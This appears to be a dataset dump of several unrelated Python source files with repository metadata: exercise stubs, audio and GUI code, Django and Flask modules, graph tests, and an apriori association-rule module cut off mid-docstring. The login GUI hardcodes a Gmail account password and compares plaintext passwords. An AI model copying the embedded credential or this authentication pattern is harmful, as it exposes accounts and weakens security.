python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
# feladat.py
# 1. feladat
# Írjon függvényt szokoev_e néven
# A függvény térjen vissza igaz értékkel, ha a paraméterben megadott évszám szőköév
def szokoev_e(ev:int) -> bool:
# 2. feladat
# A függvény bemenő paraméterei az a, b, c egész számok
# Írjon kódot amely eredményeként az a változóba lesz a legnagyobb szám, a b változóba a második legnagyobb szám és a c változóba pedig a legkisebb szám.
def csokkeno(a:int, b:int, c:int)->tuple:
eredmeny=[a,b,c]
return eredmeny
# 3. feladat
# Készítsen palindrom-e nevű függvényt amely egy stringről megállapítja, hogy palidrom-e
# Tágabb értelembe a palindrom olyan szöveg vagy szókapcsolat, amely visszafelé olvasva is ugyanaz
def palindrom_e(mondat:str)->bool:
return True;
# 4. feladat
# Írjon függvényt amely meghatározza, hogy egy adott intervallumban hány négyzetszám van
# Pl. [1-9] intervallum esetén 1, 2, 3 négyzetei esnek, tehát három négyzetszám van
def negyzetszamok_szama(a:int, b:int)->int:
return 0
| 28.285714
| 153
| 0.756566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 803
| 0.763308
|
0b2242c98f153e44bcbb14ec8721042c75e0511e
| 76
|
py
|
Python
|
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | 1
|
2018-04-02T15:38:10.000Z
|
2018-04-02T15:38:10.000Z
|
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | null | null | null |
bin/pymodules/objectedit/__init__.py
|
mattire/naali
|
28c9cdc84c6a85e0151a222e55ae35c9403f0212
|
[
"Apache-2.0"
] | null | null | null |
#from editgui import EditGUI
#from only_layout import OnlyLayout as EditGUI
| 25.333333
| 46
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.973684
|
0b24417f2ee0b6b95e1c21f1f50ee2435fb6de2e
| 1,210
|
py
|
Python
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 133
|
2018-05-18T13:54:10.000Z
|
2022-02-15T02:14:20.000Z
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 68
|
2018-06-03T16:42:09.000Z
|
2021-01-29T10:58:30.000Z
|
audiomate/processing/pipeline/onset.py
|
CostanzoPablo/audiomate
|
080402eadaa81f77f64c8680510a2de64bc18e74
|
[
"MIT"
] | 37
|
2018-11-02T02:40:29.000Z
|
2021-11-30T07:44:50.000Z
|
import librosa
import numpy as np
from . import base
from . import spectral
class OnsetStrength(base.Computation):
"""
Compute a spectral flux onset strength envelope.
Based on http://librosa.github.io/librosa/generated/librosa.onset.onset_strength.html
Args:
n_mels (int): Number of mel bands to generate.
"""
def __init__(self, n_mels=128, parent=None, name=None):
super(OnsetStrength, self).__init__(left_context=1, right_context=0, parent=parent, name=name)
self.n_mels = n_mels
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
# Compute mel-spetrogram
power_spec = np.abs(spectral.stft_from_frames(chunk.data.T)) ** 2
mel = np.abs(librosa.feature.melspectrogram(S=power_spec, n_mels=self.n_mels, sr=sampling_rate))
mel_power = librosa.power_to_db(mel)
# Compute onset strengths
oenv = librosa.onset.onset_strength(S=mel_power, center=False)
# Switch dimensions and add dimension to have frames
oenv = oenv.T.reshape(oenv.shape[0], -1)
# Remove context
oenv = oenv[chunk.left_context:oenv.shape[0] - chunk.right_context]
return oenv
| 31.025641
| 104
| 0.686777
| 1,130
| 0.933884
| 0
| 0
| 0
| 0
| 0
| 0
| 338
| 0.279339
|
0b24c9c12856cb1232066c7941cc8a2db9d6f09f
| 2,496
|
py
|
Python
|
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
friction_ramp_analysis/classes/callForceRampGUI.py
|
JSotres/AFM-Friction-Ramp-Analysis
|
d663134f148575f09e2991186c991ed00598ab5e
|
[
"MIT"
] | null | null | null |
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog
import sys
from .readNanoscopeForceRamps import *
import matplotlib.pyplot as plt
from ..qt5_ui_files.ForceRampGUI import *
from matplotlib.backends.backend_qt5agg import (NavigationToolbar2QT as NavigationToolbar)
import os
import math
from ..qt5_ui_files.mplwidget1plot import mplwidget1plot
class forceRampGUI(QMainWindow):
signal1 = QtCore.pyqtSignal(float)
signal2 = QtCore.pyqtSignal(float)
def __init__(self):
super().__init__()
self.ui = Ui_ForceRampGUI()
self.ui.setupUi(self)
self.ui.pushButtonSendVi.clicked.connect(self.sendVi)
self.ui.pushButtonSendVf.clicked.connect(self.sendVf)
self.ui.pushButtonGetValue.clicked.connect(self.getValue)
MplToolbar = NavigationToolbar(self.ui.widget.canvas, self)
self.addToolBar(MplToolbar)
filename = QFileDialog.getOpenFileNames(
self, "Open File", os.getcwd(), "All Files (*)")[0][0]
self.rampObject = NanoscopeRamp(filename)
self.rampObject.readHeader()
self.rampObject.readRamps()
self.plotRamp()
def getValue(self):
x1,x2 = self.ui.widget.canvas.axes.get_xlim()
condition = np.logical_and((self.rampObject.Ramp[0]['RawX']>x1),(self.rampObject.Ramp[0]['RawX']<x2))
if self.ui.radioButtonForward.isChecked() == True:
yf = self.rampObject.Ramp[0]['RawY'][0][condition]
self.ui.lineEditValue.setText(str(format(yf.mean(),'.3f')))
elif self.ui.radioButtonBackward.isChecked() == True:
yb = self.rampObject.Ramp[0]['RawY'][1][condition]
self.ui.lineEditValue.setText(str(format(yb.mean(),'.3f')))
else:
yf = self.rampObject.Ramp[0]['RawY'][0][condition]
yb = self.rampObject.Ramp[0]['RawY'][1][condition]
y2 = (yf+yb)/2
self.ui.lineEditValue.setText(str(format(y2.mean(),'.3f')))
QtCore.pyqtSlot()
def sendVi(self):
value = float(self.ui.lineEditValue.text())
self.signal1.emit(value)
QtCore.pyqtSlot()
def sendVf(self):
value = float(self.ui.lineEditValue.text())
self.signal2.emit(value)
def plotRamp(self):
self.ui.widget.canvas.axes.clear()
self.ui.widget.canvas.axes.plot(self.rampObject.Ramp[0]['RawX'], self.rampObject.Ramp[0]['RawY'][0][:])
self.ui.widget.canvas.axes.plot(self.rampObject.Ramp[0]['RawX'], self.rampObject.Ramp[1]['RawY'][1][:])
self.ui.widget.canvas.axes.set_ylabel('Photodiode Vertical Signal (V)')
self.ui.widget.canvas.axes.set_xlabel('Sample Displacement (nm)')
self.ui.widget.canvas.figure.tight_layout()
self.ui.widget.canvas.draw()
| 35.657143
| 105
| 0.733574
| 2,130
| 0.853365
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.063702
|
0b28b47566a0388433df755a312dddf760b4c430
| 1,250
|
py
|
Python
|
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | null | null | null |
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | 43
|
2022-02-07T00:18:35.000Z
|
2022-03-21T04:42:48.000Z
|
onebarangay_psql/users/tests/test_admin.py
|
PrynsTag/oneBarangay-PostgreSQL
|
11d7b97b57603f4c88948905560a22a5314409ce
|
[
"Apache-2.0"
] | null | null | null |
"""Create your tests for the admin app here."""
import pytest
from django.contrib.auth import get_user_model
from django.urls import reverse
pytestmark = pytest.mark.django_db
User = get_user_model()
class TestUserAdmin:
"""Test the admin interface."""
def test_changelist(self, admin_client):
"""Test the changelist view."""
url = reverse("admin:users_user_changelist")
response = admin_client.get(url)
assert response.status_code == 200
def test_search(self, admin_client):
"""Test the search functionality."""
url = reverse("admin:users_user_changelist")
response = admin_client.get(url, data={"q": "test"})
assert response.status_code == 200
def test_add(self, admin_client):
"""Test the add user functionality."""
url = reverse("admin:users_user_add")
response = admin_client.get(url)
assert response.status_code == 200
def test_view_user(self, admin_client):
"""Test the view user functionality."""
user = User.objects.get(username="admin")
url = reverse("admin:users_user_change", kwargs={"object_id": user.pk})
response = admin_client.get(url)
assert response.status_code == 200
| 33.783784
| 79
| 0.668
| 1,046
| 0.8368
| 0
| 0
| 0
| 0
| 0
| 0
| 354
| 0.2832
|
0b296cbeff42f183e0f9446e0c1d52f582289ecd
| 1,129
|
py
|
Python
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 5
|
2018-07-16T16:23:21.000Z
|
2021-08-20T15:43:23.000Z
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 719
|
2018-07-09T17:19:57.000Z
|
2022-03-30T15:30:59.000Z
|
neuroscout/resources/dataset.py
|
jdkent/neuroscout
|
67aaafdf883988e2048197dc9ce4559a28e3b7b6
|
[
"BSD-3-Clause"
] | 9
|
2019-07-10T17:45:31.000Z
|
2021-08-30T21:51:21.000Z
|
from flask_apispec import MethodResource, marshal_with, doc, use_kwargs
from webargs import fields
from ..models import Dataset
from ..core import cache
from .utils import first_or_404
from ..schemas.dataset import DatasetSchema
class DatasetResource(MethodResource):
@doc(tags=['dataset'], summary='Get dataset by id.')
@cache.cached(60 * 60 * 24 * 300, query_string=True)
@marshal_with(DatasetSchema)
def get(self, dataset_id):
return first_or_404(Dataset.query.filter_by(id=dataset_id))
class DatasetListResource(MethodResource):
@doc(tags=['dataset'], summary='Returns list of datasets.')
@use_kwargs({
'active_only': fields.Boolean(
missing=True, description="Return only active Datasets")
},
location='query')
@cache.cached(60 * 60 * 24 * 300, query_string=True)
@marshal_with(DatasetSchema(
many=True, exclude=['dataset_address', 'preproc_address', 'runs']))
def get(self, **kwargs):
query = {}
if kwargs.pop('active_only'):
query['active'] = True
return Dataset.query.filter_by(**query).all()
| 35.28125
| 75
| 0.680248
| 894
| 0.791851
| 0
| 0
| 804
| 0.712135
| 0
| 0
| 175
| 0.155004
|
0b2a468542d7634a98be235c3eb2a43a90a6aa6a
| 2,194
|
py
|
Python
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 88
|
2020-06-11T03:14:30.000Z
|
2022-03-21T07:36:36.000Z
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 4
|
2021-04-29T19:22:08.000Z
|
2021-09-22T19:22:48.000Z
|
tests/test_measures.py
|
lanxuedang/TIGER
|
a134b49f9c64321cb521a25953f9771ced9b597e
|
[
"MIT"
] | 13
|
2020-06-14T14:19:01.000Z
|
2022-02-17T22:50:41.000Z
|
import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
def test_measures():
measure_ground_truth = { # graph order: o4, p4, c4, k4_1, c4_0, c4_1, c4_2, c4_3
'node_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'edge_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'diameter': [None, 3, 2, 2, 1, None, 5, 5, 5],
'average_distance': [None, 1.67, 1.33, 1.17, 1, None, 2.29, 2.29, 2.29],
'average_inverse_distance': [0, 0.72, 0.83, 0.92, 1.0, 0.36, 0.58, 0.58, 0.58],
'average_vertex_betweenness': [0, 4, 3.5, 3.25, 3, 3.5, 11.5, None, None],
'average_edge_betweenness': [0, 3.33, 2.0, 1.4, 1, 2, 7.11, 7.11, 7.11],
'average_clustering_coefficient': [0, 0, 0, 0.83, 1, 0, 0, None, None],
'largest_connected_component': [1, 4, 4, 4, 4, 4, 8, 8, 8],
'spectral_radius': [0, 1.62, 2, 2.56, 3, 2, 2.34, 2.9, 3.65],
'spectral_gap': [0, 1, 2, 2.56, 4, 0, 0.53, 1.19, 2],
'natural_connectivity': [0, 0.65, 0.87, 1.29, 1.67, 0.87, 0.97, 1.28, 1.81],
'spectral_scaling': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'generalized_robustness_index': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'algebraic_connectivity': [0, 0.59, 2, 2, 4, 0, 0.29, 0.4, 0.45],
'number_spanning_trees': [0, 1, 4, 8, 16, 0, 16, 32, 48],
'effective_resistance': [np.inf, 10, 5, 4, 3, np.inf, 46, 38, 35.33]
}
graphs = [o4_graph(), p4_graph(), c4_graph(), k4_1_graph(), k4_2_graph(),
two_c4_0_bridge(), two_c4_1_bridge(), two_c4_2_bridge(), two_c4_3_bridge()]
for measure_name, graph_values in measure_ground_truth.items():
for idx, graph in enumerate(graphs):
value = run_measure(graph, measure_name)
if value is not None: value = round(value, 2)
# print(idx, measure_name, value)
assert (value, graph_values[idx])
def main():
test_measures()
if __name__ == '__main__':
main()
| 42.192308
| 97
| 0.591613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 475
| 0.2165
|
0b303fe60108c7d81edf13f0852f1b122917c330
| 13,679
|
py
|
Python
|
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
AuroraAppCode/login.py
|
zahraahhajhsn/automatic-student-counter
|
9b3e38f41aba3fbc59e1ccdaeae9ba229415f977
|
[
"Apache-2.0"
] | null | null | null |
import verifyController
import pyodbc
from PyQt5.QtWidgets import QMessageBox
from PyQt5 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import (QCoreApplication, QMetaObject,QSize,Qt)
from PySide2.QtGui import (QCursor, QFont,QIcon)
from PySide2.QtWidgets import *
from PySide2 import QtCore, QtGui, QtWidgets
import cameras
import pickle
import smtplib
from random import randint
import PyQt5
class Ui_LoginWindow(object):
def setupUi(self, LoginWindow):
LoginWindow.setObjectName("MainWindow")
LoginWindow.resize(1000, 1000)
LoginWindow.showMaximized()
sizePolicy = QtWidgets.QSizePolicy(QSizePolicy.Preferred,QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(10)
sizePolicy.setVerticalStretch(10)
sizePolicy.setHeightForWidth(LoginWindow.sizePolicy().hasHeightForWidth())
LoginWindow.setSizePolicy(sizePolicy)
LoginWindow.setCursor(QCursor(Qt.ArrowCursor))
icon =QIcon()
#icon.addPixmap(QPixmap("e9b4c65fb45f70ad1b573f67e486d91c.jpg"), QIcon.Normal , QIcon.Off)
LoginWindow.setWindowIcon(icon)
LoginWindow.setStyleSheet("QMainWindow{background-image: url(images/new.png);}")
LoginWindow.setToolButtonStyle(Qt.ToolButtonIconOnly)
self.centralwidget = QWidget(LoginWindow)
self.roomnumber = QComboBox()
self.roomnumber.setObjectName("roomnumber")
self.cameradep = QComboBox()
self.cameradep.setObjectName("cameradep")
self.centralwidget.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint)
self.verticalLayout.setContentsMargins(200, 10, 200, 30)
self.verticalLayout.setSpacing(30)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QLabel(self.centralwidget)
font = QFont()
font.setFamily("Arial Black")
font.setPointSize(35)
font.setBold(False)
font.setItalic(False)
font.setWeight(10)
self.label.setFont(font)
self.label.setStyleSheet("color: rgb(0, 0, 0);\n"
"font: 87 35pt \"Arial Black\";")
self.label.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.verticalWidget = QWidget(self.centralwidget)
self.verticalWidget.setStyleSheet("background-color: rgb(0, 0, 0);\n"
"font: 87 11pt \"Arial Black\";\n"
"color: rgb(255, 255, 255);")
self.verticalWidget.setObjectName("verticalWidget")
self.verticalLayout_2 = QVBoxLayout(self.verticalWidget)
self.verticalLayout_2.setSizeConstraint(QLayout.SetDefaultConstraint)
self.verticalLayout_2.setContentsMargins(100, 30, 100, 10)
self.verticalLayout_2.setSpacing(15)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_3 = QLabel(self.verticalWidget)
self.label_3.setObjectName("label_3")
self.verticalLayout_2.addWidget(self.label_3)
self.lineEdit_2 = QLineEdit(self.verticalWidget)
self.lineEdit_2.setObjectName("lineEdit_2")
self.verticalLayout_2.addWidget(self.lineEdit_2)
self.label_2 = QLabel(self.verticalWidget)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.lineEdit = QLineEdit(self.verticalWidget)
self.lineEdit.setObjectName("lineEdit")
self.lineEdit.setEchoMode(QLineEdit.Password)
self.verticalLayout_2.addWidget(self.lineEdit)
self.incorrect = QLabel(self.verticalWidget)
self.incorrect.setText("")
self.incorrect.setObjectName("incorrect")
self.incorrect.setStyleSheet("color: rgb(225, 37, 52);\n"
"font: 87 10pt \"Arial Black\";")
self.verticalLayout_2.addWidget(self.incorrect)
self.verticalWidget_2 = QWidget(self.verticalWidget)
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.verticalWidget_2.sizePolicy().hasHeightForWidth())
self.verticalWidget_2.setSizePolicy(sizePolicy)
self.verticalWidget_2.setMinimumSize(QSize(200, 121))
self.verticalWidget_2.setBaseSize(QSize(10, 0))
self.verticalWidget_2.setCursor(QCursor(Qt.ArrowCursor))
self.verticalWidget_2.setObjectName("verticalWidget_2")
self.verticalLayout_3 = QVBoxLayout(self.verticalWidget_2)
self.verticalLayout_3.setContentsMargins(30, 0, 30, 30)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.pushButton = QPushButton(self.verticalWidget_2)
self.pushButton.setStyleSheet("background-color: rgb(225, 37, 52);\n"
"border-color: rgb(255, 255, 255);")
self.pushButton.setObjectName("pushButton")
self.verticalLayout_3.addWidget(self.pushButton)
self.pushButton_2 = QPushButton(self.verticalWidget_2)
self.pushButton_2.setStyleSheet("font: italic 11pt \"Arial\";\n"
"text-decoration: underline;\n"
"color: rgb(0, 85, 255);")
self.pushButton_2.setObjectName("pushButton_2")
self.verticalLayout_3.addWidget(self.pushButton_2)
self.verticalLayout_2.addWidget(self.verticalWidget_2)
self.verticalLayout_2.setStretch(0, 1)
self.verticalLayout_2.setStretch(1, 1)
self.verticalLayout_2.setStretch(2, 1)
self.verticalLayout_2.setStretch(3, 1)
self.verticalLayout_2.setStretch(5, 1)
self.verticalLayout.addWidget(self.verticalWidget, 0,Qt.AlignHCenter|Qt.AlignVCenter)
self.verticalLayout.setStretch(0, 1)
self.verticalLayout.setStretch(1, 15)
LoginWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(LoginWindow)
QMetaObject.connectSlotsByName(LoginWindow)
def retranslateUi(self, LoginWindow):
_translate =QCoreApplication.translate
LoginWindow.setWindowTitle(_translate("MainWindow", "login","None"))
self.label.setText(_translate("MainWindow", "LOGIN","None"))
self.label_3.setText(_translate("MainWindow", "<html><head/><body><p align=\"center\">Enter Username</p></body></html>","None"))
self.label_2.setText(_translate("MainWindow", "<html><head/><body><p align=\"center\"><br/>Enter Password</p></body></html>","None"))
self.pushButton.setText(_translate("MainWindow", "Submit","None"))
self.pushButton_2.setText(_translate("MainWindow", "forgot password?","None"))
self.pushButton.clicked.connect(lambda:self.open_window(LoginWindow))
self.pushButton_2.clicked.connect(lambda:self.send_email(LoginWindow))
def open_window(self,LoginWindow):
if len(self.lineEdit_2.text()) == 0:
self.incorrect.setText("empty email field")
elif len(self.lineEdit.text()) == 0:
self.incorrect.setText("empty password field")
else:
server='Nurkanaan\sqlexpress'
database='senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER='+server+'; \
DATABASE='+database+'; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select * from headsInfo where email=? and pass=?"
cursor.execute(insert_query,self.lineEdit_2.text(), self.lineEdit.text())
result = cursor.fetchall()
conn.commit()
if len(result) == 0:
self.incorrect.setText("invalid email/password!")
server = 'Nurkanaan\sqlexpress'
database = 'senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER=' + server + '; \
DATABASE=' + database + '; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select * from administratorr where email=? and pass=?"
cursor.execute(insert_query, self.lineEdit_2.text(), self.lineEdit.text())
result = cursor.fetchall()
conn.commit()
if len(result)==0:
self.incorrect.setText("invalid email/password!")
else:
pickle.dump("no", open("sc.dat", "wb"))
pickle.dump(self.lineEdit_2.text(),open("email.dat" , "wb"))
self.window = PyQt5.QtWidgets.QMainWindow()
self.ui = cameras.Ui_CameraMainWindow()
self.ui.setupUi(self.window)
self.window.show()
LoginWindow.close()
else:
pickle.dump("no", open("sc.dat", "wb"))
pickle.dump(self.lineEdit_2.text(), open("email.dat", "wb"))
self.window = PyQt5.QtWidgets.QMainWindow()
self.ui = cameras.Ui_CameraMainWindow()
self.ui.setupUi(self.window)
self.window.show()
LoginWindow.close()
def send_email(self,LoginWindow):
if len(self.lineEdit_2.text()) == 0:
self.incorrect.setText("empty email field")
else:
server = 'Nurkanaan\sqlexpress'
database = 'senior'
conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server}; \
SERVER=' + server + '; \
DATABASE=' + database + '; \
Trusted_Connection=yes;')
cursor = conn.cursor()
insert_query = "Select email from headsInfo where email=?"
cursor.execute(insert_query, self.lineEdit_2.text())
result = cursor.fetchall()
if len(result) == 0:
self.incorrect.setText("invalid email/password!")
else:
try:
self.incorrect.setText("<strong>Loading...</strong>")
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.login('AuroraCameraApplication@gmail.com', 'Aurora1234')
rand = randint(100000, 999999)
pickle.dump(rand, open("rand.dat", "wb"))
print(rand)
subject = "Recover Password"
msg = "your recovery code is: " + str(rand) + " \nplease enter this code in the page that opened in the application"
message = 'Subject: {}\n\n{}'.format(subject, msg)
#str(self.lineEdit_2.text())
server.sendmail('AuroraCameraApplication@gmail.com',str(self.lineEdit_2.text()), message)
server.quit()
self.timer = QtCore.QTimer()
self.timer.start(35)
QtCore.QTimer.singleShot(2000,lambda: self.message(LoginWindow))
QtCore.QTimer.singleShot(2000,lambda :self.incorrect.setText(""))
except:
m = QMessageBox()
msg1 = "<html><head/><body><p align=\"center\"><span style=\" font-size:10pt; font-weight:600;\">No internet connection!</span></p><p>please check internet connection.</p></body></html>"
m.setText(msg1)
m.setStandardButtons(QMessageBox.Ok)
m.setWindowTitle("AURORA")
m.setIcon(QMessageBox.Information)
reply = m.exec()
def message(self,LoginWindow):
m = QMessageBox()
msg1="<html><head/><body><p align=\"center\"><span style=\" font-size:10pt; font-weight:600;\">recovery code sent to: "+str(self.lineEdit_2.text())+ " </span></p><p> please follow instructions in sent email</p></body></html>"
m.setText(msg1)
m.setStandardButtons(QMessageBox.Ok)
m.setWindowTitle("AURORA")
m.setIcon(QMessageBox.NoIcon)
m.setWindowFlag(Qt.FramelessWindowHint)
reply = m.exec()
if reply == QMessageBox.Ok:
self.open(LoginWindow)
def open(self,LoginWindow):
pickle.dump(self.lineEdit_2.text(), open("email.dat", "wb"))
self.window = QtWidgets.QMainWindow()
self.ui = verifyController.Verfifycontroller()
LoginWindow.close()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
LoginWindow = QtWidgets.QMainWindow()
ui = Ui_LoginWindow()
ui.setupUi(LoginWindow)
LoginWindow.show()
sys.exit(app.exec_())
| 52.209924
| 238
| 0.59288
| 13,013
| 0.951312
| 0
| 0
| 0
| 0
| 0
| 0
| 2,942
| 0.215074
|
0b306e809cb7c5ad319eabca404494268373c70e
| 13,195
|
py
|
Python
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 4
|
2016-12-17T20:06:10.000Z
|
2021-11-19T04:45:29.000Z
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 11
|
2021-01-06T05:35:11.000Z
|
2022-03-11T23:28:31.000Z
|
ml/association/apriori.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 3
|
2015-06-12T10:44:16.000Z
|
2021-07-26T18:39:47.000Z
|
"""Association mining -- apriori algo"""
__author__ = 'thor'
from numpy import *
# Modified from:
# Everaldo Aguiar & Reid Johnson (https://github.com/cse40647/cse40647/blob/sp.14/10%20-%20Apriori.ipynb)
#
# Itself Modified from:
# Marcel Caraciolo (https://gist.github.com/marcelcaraciolo/1423287)
#
# Functions to compute and extract association rules from a given frequent
# itemset generated by the Apriori algorithm.
import pandas as pd
from statsmodels.stats.proportion import samplesize_confint_proportion
def choose_sample_size(min_confidence, alpha=0.05, half_length=None):
if half_length is None:
t = 0.20 * min_confidence if min_confidence < 0.5 else 0.20 * (1 - min_confidence)
half_length = max(0.01, t) # choose half length to be a proportion (0.2) of min_confidence
return samplesize_confint_proportion(
proportion=min_confidence,
half_length=half_length,
alpha=alpha,
method='normal')
def association_rules(dataset, min_confidence=0.2, min_support=None, output='dataframe', verbose=False):
assert min_confidence > 0 and min_confidence <= 1, "min_confidence must be between 0 and 1"
if min_support is None:
# if no min_support is given, choose it to be the sample size you need to get 95% conf in proportion estimate
min_support = choose_sample_size(min_confidence, alpha=0.05, half_length=None)
if min_support > 1:
min_support /= float(len(dataset))
F, support_data = apriori(dataset, min_support=min_support, verbose=False)
H = generate_rules(F, support_data, min_confidence=min_confidence, verbose=verbose)
if output == 'triple':
return H
elif output == 'dataframe':
def set_to_string(s):
return str(", ".join(s))
support_df = pd.DataFrame({'condition': list(map(set_to_string, list(support_data.keys()))),
'condition_frequency': list(support_data.values())})
support_df['condition_count'] = len(dataset) * support_df['condition_frequency']
d = pd.DataFrame([{'condition': set_to_string(condition),
'effect': set_to_string(effect),
'effect_frequency': support}
for condition, effect, support in H])
d = pd.merge(d, support_df, how='inner', on='condition')
d['condition_and_effect_count'] = d['effect_frequency'] * d['condition_count']
d = d[['condition', 'effect', 'effect_frequency', 'condition_count', 'condition_and_effect_count',
'condition_frequency']]
return d.sort('effect_frequency', ascending=False).reset_index(drop=True)
def apriori(dataset, min_support=0.5, verbose=False):
"""Implements the Apriori algorithm.
The Apriori algorithm will iteratively generate new candidate
k-itemsets using the frequent (k-1)-itemsets found in the previous
iteration.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate
candidate itemsets.
min_support : float
The minimum support threshold. Defaults to 0.5.
Returns
-------
F : list
The list of frequent itemsets.
support_data : dict
The support data for all candidate itemsets.
References
----------
.. [1] R. Agrawal, R. Srikant, "Fast Algorithms for Mining Association
Rules", 1994.
"""
C1 = create_candidates(dataset)
D = list(map(set, dataset))
F1, support_data = support_prune(D, C1, min_support, verbose=False) # prune candidate 1-itemsets
F = [F1] # list of frequent itemsets; initialized to frequent 1-itemsets
k = 2 # the itemset cardinality
while (len(F[k - 2]) > 0):
Ck = apriori_gen(F[k-2], k) # generate candidate itemsets
Fk, supK = support_prune(D, Ck, min_support) # prune candidate itemsets
support_data.update(supK) # update the support counts to reflect pruning
F.append(Fk) # add the pruned candidate itemsets to the list of frequent itemsets
k += 1
if verbose:
# Print a list of all the frequent itemsets.
for kset in F:
for item in kset:
print(("" \
+ "{" \
+ "".join(str(i) + ", " for i in iter(item)).rstrip(', ') \
+ "}" \
+ ": sup = " + str(round(support_data[item], 3))))
return F, support_data
def create_candidates(dataset, verbose=False):
"""Creates a list of candidate 1-itemsets from a list of transactions.
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
itemsets.
Returns
-------
The list of candidate itemsets (c1) passed as a frozenset (a set that is
immutable and hashable).
"""
c1 = [] # list of all items in the database of transactions
for transaction in dataset:
for item in transaction:
if not [item] in c1:
c1.append([item])
c1.sort()
if verbose:
# Print a list of all the candidate items.
print(("" \
+ "{" \
+ "".join(str(i[0]) + ", " for i in iter(c1)).rstrip(', ') \
+ "}"))
# Map c1 to a frozenset because it will be the key of a dictionary.
return list(map(frozenset, c1))
def support_prune(dataset, candidates, min_support, verbose=False):
"""Returns all candidate itemsets that meet a minimum support threshold.
By the apriori principle, if an itemset is frequent, then all of its
subsets must also be frequent. As a result, we can perform support-based
pruning to systematically control the exponential growth of candidate
itemsets. Thus, itemsets that do not meet the minimum support level are
pruned from the input list of itemsets (dataset).
Parameters
----------
dataset : list
The dataset (a list of transactions) from which to generate candidate
